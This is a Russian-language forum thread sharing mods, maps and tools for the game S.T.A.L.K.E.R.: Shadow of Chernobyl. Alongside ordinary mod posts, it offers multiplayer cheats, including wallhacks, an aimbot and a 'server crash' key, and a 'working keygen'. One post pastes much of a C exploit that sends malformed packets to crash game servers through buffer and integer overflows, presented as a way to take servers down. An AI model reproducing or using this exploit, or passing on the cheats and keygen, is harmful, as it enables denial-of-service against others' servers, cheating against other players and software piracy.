PDA

Просмотр полной версии : файлы, моды , проги на тч



ruslanzal
11.07.2009, 19:34
хватит уже праздновать, пора ремонт в доме начинать, хотя бы мебель перетащим со старого форума

xSETx
11.07.2009, 23:15
подмена геймдаты для ТЧ (V1.0006). Прыжки 20, бесконечный спринт, бег в эгзоскелете, нет отдачи у оружия, костюмы защищают лучше, шопхак (всё оружие с начала игры и стоит 0 р.)!
You can see links before reply
Пароль дам, пишите в личку. ;)

SEG@
21.07.2009, 17:06
Карта "Рыжий лес"
Доступные режимы игры: AH, DM, TDM.
Переделана для тч You can see links before reply
1 часть You can see links before reply
2 часть You can see links before reply

пожарка для тч You can see links before reply
Установка : Переносим карты в формате .xdb0 из архива в папку установленного сталкера , в папку "mods" .

карта лиманск
1 часть You can see links before reply (You can see links before reply)
2 часть You can see links before reply (You can see links before reply)

SEG@
22.07.2009, 23:17
пздц, а я незнал что на тч подмена геймдаты тоже прокатит о_о
А ты как думал геймдата рулит!!!
патч Shadow of Chernobyl 1.0007b You can see links before reply

ruslanzal
24.07.2009, 14:26
Вот волхак для теней чернобыля, сам опробовал - неплохая вещь, представляю на ваш суд, инструкция внутри архива. Качаем здесь You can see links before reply

Luary
28.07.2009, 17:23
Карта Экспресс для СТАЛКЕР ТЧ сам не тестил, нет игры.
Ссылка------ You can see links before reply

You can see links before reply

колян777
02.08.2009, 12:11
выкладываю уязвимости теней чернобыля на чистое небо выложу чуть позжеYou can see links before reply


printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

ver = stalker_info(buff, &peer);
if(!ver) ver = 0x00010006;
printf("\n- use version %08x\n", ver);
seed = time(NULL);

do {
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();

seed = (seed * 0x343FD) + 0x269EC3;

for(pck = 0; pck <= 4; pck++) {
p = buff;
switch(pck) {
case 0: {
*p++ = 0x88;
*p++ = 0x01;
*p++ = 0x00;
*p++ = 0x00;
p += putxx(p, ver, 32);
p += putxx(p, seed, 32);
p += putxx(p, seed, 32); // should be a different number
break;
}
case 1: {
*p++ = 0x80;
*p++ = 0x02;
*p++ = 0x01;
*p++ = 0x00;
p += putxx(p, ver, 32);
p += putxx(p, seed, 32);
p += putxx(p, seed, 32); // should be a different number
break;
}
case 2: {
*p++ = 0x3f;
*p++ = 0x02;
*p++ = 0x00;
*p++ = 0x00;
p += putxx(p, seed, 32);
break;
}
case 3: {
sprintf(nick, "%08x", seed);

*p++ = 0x7f;
*p++ = 0x00;
*p++ = 0x01;
*p++ = 0x00;
p += putxx(p, 0x000000c1, 32);
p += putxx(p, 0x00000002, 32);
p += putxx(p, 0x00000007, 32);
p += putcc(p, 0, 0x50);// hash at 0x48 set to zeroes
pwdlen = putws(p, pwd); p += pwdlen;
p += putcc(p, 0, 4); // don't know
strncpy(p, nick, 0x80); p += 0x80;
p += putxx(p, 1, 32);
nicklen = putws(p, nick); p += nicklen;

putxx(buff + 0x10, 0xe0 + pwdlen, 32);
putxx(buff + 0x14, nicklen, 32);
putxx(buff + 0x18, 0x58 + pwdlen, 32);
if(pwd[0]) putxx(buff + 0x20, 0x58, 32);
putxx(buff + 0x24, pwdlen, 32);
break;
}
case 4: {
*p++ = 0x7f;
*p++ = 0x00;
*p++ = 0x02;
*p++ = 0x02;
p += putxx(p, 0x000000c3, 32);
break;
}
default: break;
}

len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1);

if(pck == 3) {
while(buff[0] != 0x7f) {
len = send_recv(sd, NULL, 0, buff, BUFFSZ, &peer, 1);
}
getxx(buff + 8, &res, 32);
if(res == 0x80158410) {
printf("\n- server is protected by password, insert it: ");
fgetz(stdin, pwd, sizeof(pwd));
break;
} else if(res == 0x80158610) {
printf("\n server full ");
for(i = 5; i; i--) {
printf("%d\b", i);
sleep(ONESEC);
}
break;
} else if(res == 0x80158260) {
printf("\nError: your IP is banned\n");
exit(1);
} else if(res) {
printf("\nError: unknown error number (0x%08x)\n", res);
//exit(1);
}
}
}

if(pck > 4) {
printf("\n- send malformed packet\n");
p = buff;
*p++ = 0x39;
*p++ = 0x00;
*p++ = 0x03;
*p++ = 0x06;
switch(attack) {
case 1: {
len = build_bof(p + 1 + 2 + 1 + 4);
crc = lzo_crc32(0, p + 1 + 2 + 1 + 4, len);

*p++ = 0xe0; // 0xe0/0xe1 are ok, the others do INT3
p += putxx(p, BOFSZ, 16); // data length
*p++ = 0xc1; // 0xc1 used to specify that there is compression
p += putxx(p, crc, 32); // crc32
p += len;
break;
}
case 2: {
*p++ = 0xe0; // 0xe0/0xe1 are ok, the others do INT3
p += putxx(p, 0, 16);
// integer overflow here
break;
}
case 3: {
*p++ = 0xff; // 0xe0/0xe1 are ok, the others do INT3
p += putxx(p, 1, 16);
p += putcc(p, 'A', 1);
break;
}
default: {
printf("\nError: wrong attack number (%d)\n", attack);
exit(1);
}
}

send_recv(sd, buff, p - buff, NULL, 0, &peer, 1);
send_recv(sd, buff, p - buff, NULL, 0, &peer, 1); // to be sure that it's arrived
}

close(sd);
} while(pck <= 4);

printf("\n- done\n");
return(0);
}



int build_bof(u8 *buff) {
int lzlen;
u8 *lzmem,
*bof;

bof = malloc(BOFSZ);
if(!bof) std_err();
memset(bof, 'A', BOFSZ);

lzmem = malloc(LZO1X_999_MEM_COMPRESS);
if(!lzmem) std_err();

if(lzo1x_999_compress_level(bof, BOFSZ, buff, (void *)&lzlen, lzmem, stalker_lzo_dict, sizeof(stalker_lzo_dict), NULL, 9) != LZO_E_OK) {
printf("\n Error: LZO compression error\n");
exit(1);
}

free(bof);
free(lzmem);
return(lzlen);
}



u32 stalker_info(u8 *buff, struct sockaddr_in *peer) {
u32 chall;
int sd,
len,
i,
t,
retport = 0,
retver = 0;
u8 gs3[32],
*gamever = NULL,
*hostport = NULL;

sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();

printf("\n- send info queries\n");
send_recv(sd, GS3_QUERY, sizeof(GS3_QUERY) - 1, NULL, 0, peer, 0);
send_recv(sd, GS2_QUERY, sizeof(GS2_QUERY) - 1, NULL, 0, peer, 0);
len = send_recv(sd, NULL, 0, buff, BUFFSZ, peer, 0);
if(len < 0) goto quit;
if(len < 8) { // more than 8
len = send_recv(sd, NULL, 0, buff, BUFFSZ, peer, 0);
if(len < 0) goto quit;
} else {
memcpy(gs3, GS3_QUERYX, sizeof(GS3_QUERYX) - 1);
chall = atoi(buff + 5);
gs3[7] = chall >> 24;
gs3[8] = chall >> 16;
gs3[9] = chall >> 8;
gs3[10] = chall;
len = send_recv(sd, gs3, sizeof(GS3_QUERYX) - 1, buff, BUFFSZ, peer, 0);
if(len < 0) goto quit;
}

printf("\n- handle reply:\n");
gs_handle_info(buff, len, 0, '\0', 5, 0,
"gamever", &gamever,
"hostport", &hostport,
NULL, NULL);

if(gamever) {
for(i = 0; gamever[i]; i++) {
if(gamever[i] == '.') continue;
if(sscanf(gamever + i, "%1x", &t) != 1) continue;
retver <<= 4;
retver |= t;
}
}
if(hostport) {
retport = atoi(hostport);
printf("\n- set hostport %hu\n", retport);
peer->sin_port = htons(retport);
}

quit:
close(sd);
return(retver);
}



int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...) {
va_list ap;
int i,
args,
found;
u8 **parz,
***valz,
*p,
*limit,
*par,
*val;

va_start(ap, rear);
for(i = 0; ; i++) {
if(!va_arg(ap, u8 *)) break;
if(!va_arg(ap, u8 **)) break;
}
va_end(ap);

args = i;
parz = malloc(args * sizeof(u8 *));
valz = malloc(args * sizeof(u8 **));

va_start(ap, rear);
for(i = 0; i < args; i++) {
parz[i] = va_arg(ap, u8 *);
valz[i] = va_arg(ap, u8 **);
*valz[i] = NULL;
}
va_end(ap);

found = 0;
limit = data + datalen - rear;
*limit = 0;
data += front;
par = NULL;
val = NULL;

for(p = data; (data < limit) && p; data = p + 1, nt++) {
p = strchr(data, chr);
if(p) *p = 0;

if(nt & 1) {
if(!par) continue;
val = data;
printf(" %30s %s\n", par, val);

for(i = 0; i < args; i++) {
if(!stricmp(par, parz[i])) *valz[i] = val;
}
} else {
par = data;
}
}

free(parz);
free(valz);
return(found);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
int retry = 2,
len;

if(in) {
while(retry--) {
fputc('.', stdout);
if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
< 0) goto quit;
if(!out) return(0);
if(!timeout(sd, 1)) break;
}
} else {
if(timeout(sd, 2) < 0) retry = -1;
}

if(retry < 0) {
if(!err) return(-1);
printf("\nError: socket timeout, no reply received\n\n");
exit(1);
}

fputc('.', stdout);
len = recvfrom(sd, out, outsz, 0, NULL, NULL);
if(len < 0) goto quit;
return(len);
quit:
if(err) std_err();
return(-1);
}



int putcc(u8 *dst, int chr, int len) {
memset(dst, chr, len);
return(len);
}



int putws(u8 *dst, u8 *src) {
u8 *d,
*s;

if(!src[0]) return(0); // as required by stalker
for(s = src, d = dst; ; s++) {
*d++ = *s;
*d++ = 0;
if(!*s) break;
}
return(d - dst);
}



int fgetz(FILE *fd, u8 *data, int size) {
u8 *p;

if(!fgets(data, size, fd)) return(-1);
for(p = data; *p && (*p != '\n') && (*p != '\r'); p++);
*p = 0;
return(p - data);
}



int getxx(u8 *data, u32 *ret, int bits) {
u32 num;
int i,
bytes;

bytes = bits >> 3;
for(num = i = 0; i < bytes; i++) {
num |= (data[i] << (i << 3));
}
*ret = num;
return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
int i,
bytes;

bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> (i << 3)) & 0xff;
}
return(bytes);
}



int timeout(int sock, int secs) {
struct timeval tout;
fd_set fd_read;

tout.tv_sec = secs;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
if(select(sock + 1, &fd_read, NULL, NULL, &tout)
<= 0) return(-1);
return(0);
}



u32 resolv(char *host) {
struct hostent *hp;
u32 host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u32 *)hp->h_addr;
}
return(host_ip);
}



#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
самое прикольное как валить сервак я вам не скажу как это сделать уж извините но намек дам связано с буфером обмена (You can see links before reply)You can see links before reply (You can see links before reply)






(You can see links before reply)

ANA608
02.08.2009, 18:21
СКАЧАТЬ You can see links before reply Размер: 25.44 Мб
Разработчик: EPOS / STR Inc.
Системные требования: - Оптимизировано под 1024х768.
Графика 100 ед. +jpg deblocking
Видео бэкграунда 1000 кб./с
Звук 128 кб./с, стерео, mp3 сжатие
- Тестировался на:
Core2Duo E6600
GeForse MSI 8600GTS
2 Gb RAM DDR2/800
Описание: Скринсейверы, собранные из дополнительных "шкурок" к флэш версии ЭпоС 1.4.1:
Доп. информация: На машинах с более "низкими" характеристиками возможны тормоза.

ANA608
02.08.2009, 19:24
Обои на рабочий стол из "Сталкера"

СКАЧАТЬ You can see links before reply 30 шт.

Luary
04.08.2009, 15:38
РАБОЧИЙ Кейген для сталкер тч.За паролем в личку
You can see links before reply

goblin
13.08.2009, 21:04
Здесь собраны 34 мини мода на игру описания и инструкции имеются

нажать нэжно (You can see links before reply)

Tyler
17.08.2009, 22:32
STALKER Server Executor - Программа для запуска сервера игры S.T.A.L.K.E.R.: Shadow Of Chernobyl (v1.0001 - v1.0006). Позволяет запускать сервер игры с минимальным использованием системных ресурсов и большим выбором параметров. Программа имеет интуитивно понятный интерфейс и избавляет от редактирования конфигурационных файлов и изучения довольно замысловатого конфигурирования сетевой игры. You can see links before reply

Sveta
19.08.2009, 22:52
По просьбам желающих перезалила чит, который выкладывал xSETx, ввиду его отсутствия, описание чита в его посте, качаем здесь You can see links before reply за паролем в личку. You can see links before reply

#}{@R()N#
21.08.2009, 22:46
You can see links before reply - Чит MP Cheats Stalker Hook 1.1
УЧТИТЕ ДЛЯ 1,0004 версии !!!! Все работает !!!!
Возможности:

— автонаведение на цель

— один выстрел - один труп

— показ меток игроков на карте

— увеличение скорости бега

— увеличение высоты прыжков

— крах сервера по F8

— все оружие с начала раунда

Не тестил, попробуйте может рабочий...

Теперь играем за великого и ужасного Гордона Фримена :):):)
Мод для одиночной игры ссылка:
You can see links before reply
SCKY Mod ver.1.2


Автор:Stalker Hartman
Спасибо Garand2k,Gnome(AMK Форум) и еще трех человек(Не с АМК Форума) за критику.Без вас бы версия 1.2 не вышла бы!

Установка:

В архиве 5 папок и 2 файла .ltx.

Все папки и файл system.itx пихаем в папку config(X:\Program Files\GSC World Publishing\S.T.A.L.K.E.R\gamedata\config примерно так) и соглашаемся на замену файлов.
Файл user.itx пихаем в папку STALKER-SHOC (Для Windows XP в директории X:\Documents and Settings\All Users\ Общие документы \STALKER-SHOC.
Для Windows Vista в директории X:\Users\Public\Documents\STALKER-SHOC) здесь тоже соглашаемся на замену файлов.
Загружаем игру,радуемся:)

НОВАЯ ИГРА НЕОБХОДИМА.

Совместимость и возможные проблемы:

1)Мод только для S.T.A.L.K.E.R. SoC ver.1.0006(на других патчах не проверял)
2)Нет адаптаций под моды(АМК,SPR,Z.E.N.O.B.I.A.N.,Chernorechye,Новая Реальность и т.д.)
3)Тэстили 5 человек.Проблем нет.Совершенно безглючный мод...наверно.



Список изменений:

0.9

Изменены визуалы,иконки и оружие сталкеров на Кордоне и Свалке.

1.0

Изменены визуалы,иконки и оружие сталкеров на всех локациях.
Изменены визуалы,иконки,имена и оружие уникальных персонажей(Волк,Фанат и т.д.)

1.1

Изменены конфиги оружия
Исправлены ошибки в именах.
Исправлено несколько вылетов из-за невозможности загрузить текстуру.
Изменено несколько уникальных персонажей.

1.1 Normal Edition

Изменены конфиги оружия.
Изменен Боров.

1.2

Рост ГГ увеличен
Теперь ГГ научился таскать мутантов.
Теперь можно набрать квестов и не спеша их выполнять(Т.е. неограниченное время на выполнение)
Враги стали сильнее
Увеличено макс.здоровье мутантов.
Исправлено еще несколько вылетов.
Изменены ошибки в заданиях(Например если теперь Пулю зовут Кочевником то теперь в задании не отображается имя Пуля)
Исправлена небольшая грамматическая ошибка в задании "Отнести документы бармену"(Раньше было "Отнести документУ бармену")
Изменено несколько наград за квесты.
Изменены цены на оружие.Теперь его очень сложно купить т.к. стоит дорого.
На всё оружие(кроме ПМм,Форта,ПБ и еще несколько)можно теперь ставить глушители,подствольники и прицелы(На Мп - 5,АКС-74у и еще несколько - только глушители.На Гаусс - ничего)
Теперь у оружия реальные названия(Не уверен насчет экспериментального Форта)
У ПМм теперь 12 патронов в магазине(В ПМм в реальности тоже 12)
Изменено еще несколько сталкеров(уникальных и не уникальных).
Конфиги оружия изменены.Постарался как лучше.
Теперь можно продавать оружие НПС.Только очень дешево.
НПС теперь могут продавать оружие.
(Не пинать)Возможно немного наружен баланс.
АК74 оставил 45 патронов в обойме(ссылался на Чистое Небо,где можно было сделать 45 патронов у АК)
Изменены названия нескольких броников.
Изменена озвучка нескольких видов оружия.
МП-5 и обрез можно пихать в первый слот(Пистолетный)
Во время бэты было обнаружено,что во время боя будут дикие тормоза.(ИСПРАВЛЕНО).
еперь есть вид от третьего лица.
Все остальное(Новые визуалы,иконки и т.д.) оставлено.

Что дальше?

Возможно новые НПС
Возможно новые виды оружия
Возможно новые квесты
Возможно новая музыка в главном меню
Возможно новая музыка у бармена,Сидора...
А до новых локаций мне еще далеко :)
Ну может быть еще несколько автомобилей на нескольких локациях.
А еще может быть текстуры...
Ну и еще HUD'ы наверно :)

14.08.2009
13:53

Ссылка: You can see links before reply
Мод делал мой друг Hatman :)

#}{@R()N#
23.08.2009, 21:14
ВХ для сталкер ТЧ раскрашивает игроков в ярко-красный цвет, всех игроков вы можете видеть сквозь стены. Инструкция внутри архива, но на всякий случай повторюсь, оба файла .exe и .dll ложим в папку Bin игры, запускаем .exe двойным нажатием мыши, во всплывшем окне жмем "ok" и запускаем игру. В игре или на серве жмем NUM 1 и видим врагов сквозь стены. В сетевой игре волхак палиться скринами, поэтому будьте аккуратней.
Ссылка : You can see links before reply

-=ПсиХ=-
27.08.2009, 18:39
Вот отыскал прогу на распаковывание ресурсов тени чернобыля ))))
Качать тут You can see links before reply

redi
01.09.2009, 10:21
Чит на 1.0006(геймдата).
Увеличен урон оружия.
Качать >>>ТУТ<<< (You can see links before reply)

Bizon
06.10.2009, 23:55
Подкрутил кратность приближения, в том числе и из пистолетов. Оптика ненужна. Кучность попаданий в одну точку. Убойность поднял на 25% Цены на оружие сделал 50%, бабло и так остается. Спринт, пониженная кровопотеря, падение с высоты менее болезненно. Любой нуб станет снайпером из АК74У. Оценивайте, пробуйте. Пароля нет.
Качать сдесь: You can see links before reply

SEG@
27.10.2009, 03:53
"StalkerPack"

Модификация к игре сталкер
Четыре версии игры сталкера в одном флаконе версия 10003, 10004,10005,10006
дает возможность играть на разных версиях без переустановки игры .
хороша для тех кто любит играть в моды.
есть возможность подключать моды и сервера
устанавливается на игру пропатченую до верси 10006

Теперь установка распаковываем архив в любое удобное для вас место
и содержимое папки StalkerPack.v1.1 копируем в папку с игрой подтверждаем замену файлов, создаем ярлык к файлу StalkerPack.exe

Вот вроде бы и все.

при запуске в трее должно получится так:
You can see links before reply (You can see links before reply)

скачать (You can see links before reply)

Phantom
06.11.2009, 13:28
You can see links before reply Чит на версию 1.6.Убрана отдача,валишь с 1 выстрела(с лубого автомата),увеличена скорость хотьбы и бега,увеличена высота прыжка(можно запрыгивать на мелкие постройки и крыши) шопхак,деньги не кончаются.Вроде никто такого не выкладовал.Пользуйтесь на здоровье

Ronny222
19.11.2009, 13:46
Тема была почищена , оставленно только нужное , просьба больше не засарять тему и писать только по теме это - файлы, моды , проги на тч

вот ссылка на культный мод You can see links before reply ( разместил strelok1 ) !!!


Читай форум,а именно пост №12 там эта прога уже давно выложена получается дабл лучше сам исправь свой пост(т.е удали) Если у тебя проблема с прогой выкладывай скрин и задавай вопрос по теме,а не тупо копируй чей-то пост.Надеюсь что админы или модеры удалят и твой и мой пост нехрен засирать темы.
Он не повторялся !!!! Просто он так цитирует , а потом внизу выложил скрин со своей проблеммой !!!!
Так , что кто знает в чем проблемм помогите !!!

J.A.C.K.S.O.N
02.01.2010, 14:48
Тест по стакеру тч пороверьте наскоко вы знаете игру!)) You can see links before reply

Strage
15.01.2010, 17:16
Вот выкладываю классный мод на сингл: поиграите не пожалеете!
Мод тестировался на версии игры - v1.0004
АВТОР: МОДА LOST - ZONE ARMAGEDON (DIGBOX)

ПОМОГАЛИ
текст, диалоги:TRV,Scientist,BlinkRaven
модели:timaxa007
текстуры:timaxa007

Спасибо всем авторам модов чьи легли в основу LOST - ZONE ARMAGEDON извените если кого невписал

Как использовать:
Скопировать папку gamedata туда куда установлена игра (Например X:\games\С.Т.А.Л.К.Е.Р ТЕНЬ ЧЕРНОБЫЛЯ\)
как зависти машину?
заходим в опций настройка управления в самом низу включить двигатель
там же меняется камера
камера 1
камера 2
камера 3
Что входит в мод:
1 - 11 локаций заселены на некоторых имеются квесты, болота сделана полностью

ad - АД
av_peshera - Пещера
Cave - Пещера
dead_city - Мёртвый город
generators - Генератор
hospital - Госпиталь
limanskiy - Лиманск
marsh - Болота
puzir - Пузырь
red_forest - Рыжий лес
tower - Вышка

2 - Модификация, ремонт оружия и брони модифицировать можно после выполнения квеста с флешкой у долга, свободы, чистого неба

Модификация оружия:
1, Вес уменьшен на 500г.
2, Убойность повышена на 20%
3, Скорострельность повышена на 50%
4, Точность повышена на 50%
5, Износ уменьшен на 4%
6, Компьютеризированный прицел, даёт возможность приближения и отдаления,(ЗУМ), определять NPC. Одним
словом как у бинокля. Прицел можно поставить на любую снайперскую винтовку. Доступен только при полном апгрейде.

Модификация брони:
1, Вес уменьшен на 2Кг.
2, Повышены характеристики на 5
3, Уменьшен износ на 10
4, Возможность убрать HUD маску
5, Смена ночного видения более 7,8

3 - Нормальная боевая схема вертолетов. Наверняка не идеальная, но всяко лучше того безобразия, что было изначально. Все, халява закончилась. Вертолет уже не бесполезная безобидная декорация, как было в оригинале. Теперь это ОЧЕНЬ опасный противник, которого из ПМ хрен завалишь, сколько ни бей.

1) Тактика.

Теперь вертолеты летают парами. Армия все-таки, приказы, уставы, дисциплина и прочая подобная ересь. Одиночный вертолет (или самолет) - явление достаточно редкое, обычно летают парами или более крупными группами, тем более что Зону сложно назвать спокойным местом даже при очень богатой фантазии. Эскадрилье здесь, конечно, делать нечего, а вот пара - самое оно.

Особенность конструкции Ми-24 - то, что его крылья создают до четверти подъемной силы, но при этом экранируют поток воздуха от несущего винта. Это положительно сказывается на скорости вертолета, но длительное зависание в воздухе очень сильно сажает ресурс двигателя и строго не приветствуется. Поэтому из режимов атаки осталась только атака с заходами на цель.

Как и положено, есть ведущий, который решает, куда лететь и кого метелить, и есть ведомый, чья задача - держаться за ведущим вне боя и помогать ему в бою, не слишком отдаляясь. Пара вертолетов действует как единое целое, а не как две отдельности.

Цели имеют разный приоритет, в зависимости от потенциальной опасности. Пара ни в коем случае не будет гоняться за какой-то несчастной собакой, которая способна нанести вертолету разве что моральный ущерб, обгадив его на стоянке, если в поле зрения есть серьезно вооруженный противник, за которым и сбить не заржавеет. Цели атакуются в порядке убывания номера приоритета. Кроме того, пилоты не полные придурки, и могут понять, кто в прицеле - друг, враг или просто покурить вышел. Сейчас атакуют только врагов. Настройку сделать можно, но не думаю, что понадобится спускать вертолеты на нейтралов.

Приоритеты целей:
1. Мутанты - все мутанты без разбора. Всегда считаются врагами.
2. Сталкеры с пистолетами и дробовиками - абсолютно безвредны для вертолета.
3. Сталкеры с пистолет-пулеметами и неавтоматическим оружием под промежуточный патрон - исчезающе малые шансы хотя бы задеть вертолет, не говоря уже о сбить.
4. Автоматчики и сталкеры с неавтоматическим оружием под винтовочный патрон - могут с какой-то вероятностью нанести вред вертолету, но в целом не сильно опасны.
5. Пулеметчики и гранатометчики - первые опасней всего из наземных целей, вторые по вертолету хрен попадут, но для наземных сил - сущее наказание.
6. БТР - пока(?) безвреден для вертолета, но очень серьезно вооружен и бронирован. Сделано для поддержки наземных сил, которым может доставить массу проблем. Группировкой всех БТР автоматом назначается (пока?) - "военные".
7. Другой вертолет - самый опасный противник. Не знаю, случайно или нет, но лупит в самую уязвимую точку - двигатель и несущий винт. Короткая очередь - и все. Группировка вертолета назначается в кастом дате.

Если по одному из вертолетов попали, реагирует вся пара. Если у вертолета в момент попадания цели нет, или есть, но менее опасная - реакция однозначная, атаковать. Если существующая цель вертолета опасней, чем та, что по вертолету попала - попадание игнорируется. Если цели одинаково опасны, вертолет переключится на новую цель только в том случае, если не видит старую. Точно так же оценивает ситуацию и второй вертолет в паре.
Если один из вертолетов оказывается сильно поврежден, он пытается выйти из боя, второй вертолет прикрывает отход, атакуя того, кто подбил напарника. Как только поврежденный вертолет вышел из боя или его обидчик уничтожен, второй вертолет сопровождает поврежденного напарника и тоже покидает поле боя. Если серьезно повреждены оба вертолета, они выходят из боя каждый сам по себе.
Если один из вертолетов сбит, а второй не сильно поврежден, он продолжает бой в одиночку.

Вертолет стреляет по цели, только если она видима. От него можно спрятаться в кустах, но вертолет с небольшой вероятностью может шарахнуть ракетой наугад, даже если цели не видит, так что вечно отсиживаться по ненадежным укрытиям не получится, надо искать укрытие посущественней. Пулемет используется всегда. Ракеты - по БТР обязательно, по пулеметчикам/гранатометчикам очень часто, по автоматчикам/снайперам иногда, по остальным целям не используются.

Попадаться вертушкам на открытом месте не рекомендуется. Из-за переработанной модели повреждений и усиленного до реалистичных параметров оружия открытый бой с вертолетом, а тем более с парой - чистой воды самоубийство. Для того, чтобы если не сбить, так хотя бы отогнать вертолеты, нужно мощное оружие, много патронов и укрытие понадежней.

2) Вооружение.

Изменения коснулись в основном пулемета, потому что та дрянь, что стояла изначально, не имела ничего общего с реально устанавливаемым на Ми-24 4-хствольным пулеметом ЯкБЮ-12,7 (а, судя по модели, установлен именно он). Эффективная скорострельность доведена до 4800 выс/мин, увеличена точность и мощность, попасть под очередь - 100% смерть (4500 - 5000 выс/мин в реале, известен факт, когда очередь разрезала пополам машину).

3) Модель повреждений.

Модель повреждения для пулевых повреждений была полностью переработана. Ми-24 - боевой ударный вертолет, а не воздушный шарик. В него мало прсто попасть, надо еще и пробить броню. Но даже факт пробития брони не гарантирует нанесение урона - нужно еще и попасть в какой-то важный узел, а не просто улучшить вентиляцию.
Поэтому в крылья стрелять абсолютно бесполезно, ничего важного в них нет. Бесполезно стрелять и в оружие - детонации боезапаса на практике не происходит. Практически бессмысленно стрелять в хвостовую балку. Там из ценного только тяги управления да привод хвостового винта - не самые хрупкие детали, да и места занимают мало. Поподание в переднюю часть кабины уже серьезнее, там сосредоточены приборы и органы управления. Кроме того при удаче можно задеть пилота, что уже очень серьезно. Задняя часть кабины - десантный отсек, над которым расположен движок. Это одна область, спасибо разрабам sad Но шанс повреждения все равно достаточно высокий. Самая уязвимая часть - несущий и хвостовой винты. Шанс повреждения равен 100% - это открытые детали, если попал, то попал. И особой прочностью они тоже не отличаются.

Повреждения взрывами гранат работают по старой схеме, осколки считаются, как пули.
(Автор:Kirag)

4 - AI pack RC (автор: xStream)
1) схема "гренадер, кидание гранат обычные и электро

2) схема "медик"

Теперь NPC смогут лечить раненых друзей и нейтралов, если у них есть аптечка.
Так же NPC может себя лечить сам, если ранен больше, чем наполовину. Опять же - если есть аптечка.
Лечение происходит в спокойной обстановке при отсутствии врага

5 - AI additions (автор: Rulix aka Bak)
Дополнения, дарующие неписям новые возможности.

1)Использование аптечек и бинтов
НПС в состоянии скушать аптечку, если у него мало здоровья, или бинт, если кровотечение.

2) Стрельба с под-ствольных гранатометов
Если НПС стал счастливым обладателем винтовки с подствольником,
будет его использовать, но только если это безопасно для него самого, ну и своих будет стараться не задеть.

3) Удар в лицо
НПС дубасит прикладом всех врагов, которым не повезет оказаться поблизости.

4) Напяливание аддонов
НПС могут прикреплять к своему оружию аддоны: оптический прицел, глушитель, гранатомет.

5 - частично использован panoramic мод

6 - новое худе, инвентарь, меню

7 - в мод добавлен спальный мешок, МП3 плеер на 16 флешек, метка, возможность чтение книг

8 - Dinamic HUD (авторы: ABC Inferno and AMK team)

9 - новые возможности у монстров
зомби невидимка, адские кровососы, электрохимера, огненная химера, пси-бюрер, радиоактивный зомби, скелеты, токсический гигант, адский гигант

Зомби невидимка
3 разновидности, невидимый с освещением, полностью невидимый (из невидимости не выходит), невидимый с возможностью появиться

Адские кровососы
2 вида, огненный кровосос, электрокровосос, также поправлены старые теперь они полностью невидимые их невозможно заметить

Адские гиганты
я попытался сделать из гигантов боссов и мне кажется получилось, теперь от них невозможно убежать

1) уходит в невидимость также излучает радиацию и наносит урон на расстояние

2) бьёт электро токам и огнём

монстры расставлены на всех локациях

10 - на многих локация присутствует транспорт также враждебные бтр и вертолёты

11 - возможность купить тайник у торговца с болот, также у бармена с болот и торговца

12 - возможность испытать удачу у осведомителя с бара, покупаете ящик пандоры и нажимаете 2 раза на него если повезёт получите хорошую вещь, если не повезёт попытаете удачу в другой жизни стоимость коробки 150 000 руб.

13 - возможность активировать чит клавиши в главном меню F1 - спавен всего и вся, F2 - телепортация, F3 - восстановления: жизни, радиации, пси - излучения, морали, F4 - ГГ получает 100 000 руб, чтобы их открыть вам нужна найти 6 чемоданов с буквами d,i,g,b,o,x после чего нажать на каждый два раза

14 - добавлен выброс и пси - излучения

15 - возможность погулять по станции, теперь вместо выброса, пси - излучения (не сильное!) и возможность вернуться на Припять

16 - 8 новых квестов и боле 40 однотипных

17 - проводников пока только 2 на болоте ведут на базу и обратно

18 - для многих монстров и npc на болоте созданы smart_terrain

19 - в мод добавлено 15 оружия из ARSENAL_Mod_RC1

20 - в мод добавлено 16 броне костюмов

21 - в мод добавлено smart_monster_parts

22 - в мод добавлено система Быстрое сохранение NEW. Для сохранения нажми указанную в настройках клавишу два раза. Отличается она тем что может делать несколько сохранении а не заменять его (автор: VDG)

23 - сделано множество текстур для монстров и npc

24 - в пда отмечены вся живность зоны

25 - добавлены 2 группировки Чистое небо, Грех

26 - в мод добавлены аномальные подствольные гранаты

27 - теперь монстры выбивают оружия у ГГ

28 - в мод добавлены NIKS - stalker-cs, stalker-planet

Ссылки на мод:CСЫЛКА НА МОД ОДНИМ АРХИВОМ ЗАЛИТА НА LETITBIT C ОБНОВЛЕНИЯМИ И FIX

размер: 1 467 932 Кб.
ссылка:You can see links before reply
Две части по 500 мб и одна 43.
You can see links before reply
You can see links before reply
You can see links before reply
Ещё одно зеркало -You can see links before reply
Ещё зеркало - You can see links before reply

ВСЁ ВЗЯТО С САЙТА STALKER-CS.RU!!! МОД КЛАССНЫЙ КАЧАЙТЕ НЕ ПОЖАЛЕЕТЕ!!!=)))

SEG@
19.01.2010, 00:32
Поддержка режимов artefacthunt, teamdeathmatch, deathmatch на всех картах.

Кордон -------------- l01_escape
Свалка -------------- l02_garbage
НИИ Агропром -------------------- l03_agroprom
Подземелье НИИ Агропром------------ l03u_agr_underground
Темная Долина -------------------------- l04_darkvalley
Лаборатория Х-18 ------------------- l04u_labx18
Бар ------------------ l05_bar
Дикая территория ---------------- l06_rostok
Военные склады --------------------- l07_military
Янтарь ----------------------- l08_yantar
Лаборатория Х-16 ------------------ l08u_brainlab
Радар ---------------------- l10_radar
Лаборатория Х-10 ---------------- l10u_bunker
Припять ----------------- l11_pripyat
ЧАЭС-1 ------------------------- l12_stancia
ЧАЭС-2 ----------------------------- l12_stancia_2
Управление монолитом ----------------- l12u_control_monolith
Саркофаг ------------------- l12u_sarcofag

